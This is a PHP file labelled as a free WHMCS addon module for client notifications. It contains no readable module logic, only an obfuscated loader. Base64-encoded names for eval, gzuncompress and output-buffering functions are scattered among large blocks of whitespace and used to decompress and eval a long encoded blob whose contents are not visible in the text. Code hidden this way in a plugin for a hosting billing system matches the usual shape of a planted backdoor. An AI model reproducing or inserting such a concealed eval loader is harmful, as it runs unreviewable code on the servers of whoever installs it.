<?php
/**
 * Notify-client-by-usbhost - WHMCS Addon Module
 *
 * @see https://github.com/usbhost-dev
 *
 * @license Free 
 */
 
        $__='printf';$_='Loading Class/Code NAME';
        































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmluPokgUx99N9jv4MAk9mU0voOxojA8NKhQijdhcipeORdmIcttFEPj0W4hOz8zuw2zmksykfgSpKuucU+f8K/Wg9Psdb54JUyb7O0xOL8zk0r0yZaRom+d/SCne9fWH1bx/6d/f3zOT3tW8/1uPXt/+6rU69L8h03+NMC43zqHDhZ48nzKXoVdVv4jrXpn2KRQK5deE8WObxa5aANnmoXNO1cX4xa2P77tDk5ya3XH9TEtFoVAoFAqFQqH8bNCfMygUCuXXhUHbfPfn8Bnv/BTvmAmtCIVCoVAoX8VnLxCEo7+WQRosQ/ERDczMS44nyFeZ5wis5qiC5toNjPelP1gH2kZ0N3NuZtWi6MlmiUJRR7zJIdlaAilt72Ct6JG3EVOsmGe/SUuNxxmW9xwMhQPi2RK7eriVxw2WuKPnwlc7ucogbxc+bwVmohIfD+14KSV2493ictUcuuYexovGs6sZdMUGO1X0WD8sUbw4ea5+ho4egQUGT5b+5M650lPsnMzt1htVRZdj9HLL0R3c8jP9tWOets7wvRRkByQvGr8WZ4gXWD8e50i2a6DkSyl8CIAknrGj5ltnFXiJXUDiE/HDYOsIJKcgVRVv7yer7DqX+DuqXbu7P/xdNTuPjLltmMREWh9HJGboOefAONoFbuPJQonlKN46+p48S3RIRxpfkfzt3LjawAS8u/h/qmI0UE9A1nPo6o2xUbt+KJK6mCni12MQiYbFrUMgLw6dPzYEh+GS+FENxYx2irkna9t/7kNz9BIlZo34c0jyKaDDReS7tpYC8V+jASZzAUvaROOqbVcrCbzb1SYPXbVxanypO9H3P+q+TlyXHWmD1/i33PyZ0O7JCEhsYMlVRNbUaltv3XYsGBHNyJqExIiFEsUW8aG3WhVeM8wAqRtQohJvxCPRJsGSOIAkLlD0FA38gLQFsi8zFPuFIY3PxqEK/Vst5KjwFZv9qA4hlocBTMxCc3UO8nrkD1YhUEzBl60xSMhYzGVYAgGOFzl2yFhENIut8JaLxnulH7MXrUxrLD+e08teeFmny/ZmJr3ejz8Eppfn3bX3dvJ/zD+y/RLDN68B75j2k/n9Q1j6rtL3fVfpUw3uPhG9k+Dt5B8NW4T9';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































                                                                                                                                                                                                                     $________;
